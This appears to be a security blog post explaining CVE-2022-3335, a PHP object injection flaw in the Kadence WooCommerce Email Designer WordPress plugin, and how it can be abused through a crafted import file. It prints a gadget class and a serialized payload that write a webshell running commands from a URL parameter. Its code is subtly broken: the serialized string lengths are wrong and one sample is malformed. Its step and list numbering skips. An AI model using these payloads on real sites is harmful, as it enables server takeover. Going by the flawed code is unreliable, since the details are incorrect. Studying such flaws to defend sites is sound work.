CVE-2022-3335 - Exploit Details, Code Breakdown, and Practical Risks in Kadence WooCommerce Email Designer Plugin

WordPress powers a huge chunk of the Internet, and its plugin ecosystem is both a strength and a risk. In this long read, we explore CVE-2022-3335, a remote code execution risk lurking in the Kadence WooCommerce Email Designer plugin (versions before 1.5.7). This vulnerability comes into play during the import of design files—something seemingly harmless, but risky if you know how malicious payloads work.

What Is CVE-2022-3335?

CVE-2022-3335 is a vulnerability discovered in the Kadence WooCommerce Email Designer plugin, where the plugin unserializes the content from imported files without properly checking or filtering it. This leaves the door open to PHP Object Injection attacks when a WordPress admin uploads a crafted (malicious) design file—intentionally or by trickery.

The real danger? If a suitable gadget chain exists in any of the plugins or themes installed, an attacker can execute arbitrary code on your server.

The Code: Where Things Go Wrong

Before version 1.5.7, when you click the “Import” button in Kadence WooCommerce Email Designer, the code will read the uploaded file and use unserialize() on its contents. Here’s an abstracted and simplified version (not the literal plugin code, but close for learning):

if(isset($_FILES['import_file'])) {
    $file_content = file_get_contents($_FILES['import_file']['tmp_name']);
    $data = unserialize($file_content); // <-- DANGER!
    // ... proceed to use $data
}

What’s the problem?
unserialize() interprets the file content as PHP data structures. If the file was crafted by an attacker, it can trigger any class autoloading and special “magic methods” (__wakeup, __destruct, etc.)—which can be chained into running code.

A safe way would be to use json_decode() on a JSON export, or limit what gets unserialized.

Step 1: Create a Malicious Export File

The attacker needs to trick an admin into importing a poisoned design file. The file would contain a PHP serialized object, such as:

O:8:"Malicious"::{}

But a real attack needs an object using gadgets from available libraries (e.g., a plugin or theme class with a __destruct or __wakeup method that calls eval(), file_put_contents(), etc).

Step 3: Trigger Execution

Upon import, PHP unserializes the malicious object. If a suitable gadget chain is present, arbitrary code (malware, webshells, user creation, etc.) can run.

Suppose your site has another vulnerable plugin with this kind of destruct

class VulnerableLogger {
    public $logFile = '/tmp/myevil.php';
    public $toWrite = '<?php system($_GET["cmd"]); ?>'; // webshell

    function __destruct() {
        file_put_contents($this->logFile, $this->toWrite);
    }
}

The attacker’s import file would be

O:16:"VulnerableLogger":2:{s:7:"logFile";s:13:"/tmp/myevil.php";s:7:"toWrite";s:30:"<?php system($_GET["cmd"]); ?>";}

With this, simply importing a file as admin creates a shell on the web server!

Real-World Risk

- Admins targeted: This bug is only "triggerable" if the attacker can get an admin to import the malicious file. Risk goes up if social engineering is likely.
- Plugin ‘gadget chain’ needed: For full code execution, other plugin/theme classes with dangerous magic methods are needed. Many large sites have them, even if unintentionally.

Fix Timeline

- October 10, 2022: Vulnerability publicly reported (WPScan Advisory)
- v1.5.7: Kadence released a patch (Changelog)

Audit your site for unknown users, webshells, and suspicious plugins.

3. Remove / block admin file imports, if possible, or restrict to trusted users.
4. Disable unused plugins/themes—shrinks available gadget chains.

References and Further Reading

- WPScan Vulnerability Report: CVE-2022-3335
- Kadence’s official changelog
- PHP Object Injection Explained
- How to build (or find) a PHP gadget chain

Final Thoughts

CVE-2022-3335 highlights how easy it is for a single unsafe PHP function to unravel site security. Never import files you don’t fully trust, always keep your plugins updated, and remember—even admin actions can be exploited by clever attackers. Stay safe!


*Written exclusively for those who put WordPress security first. If you enjoyed this or found it useful, share with your friends and colleagues. Prevention begins with awareness!*


*Note: All code examples are for educational purposes only.*

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 01:41:00 UTC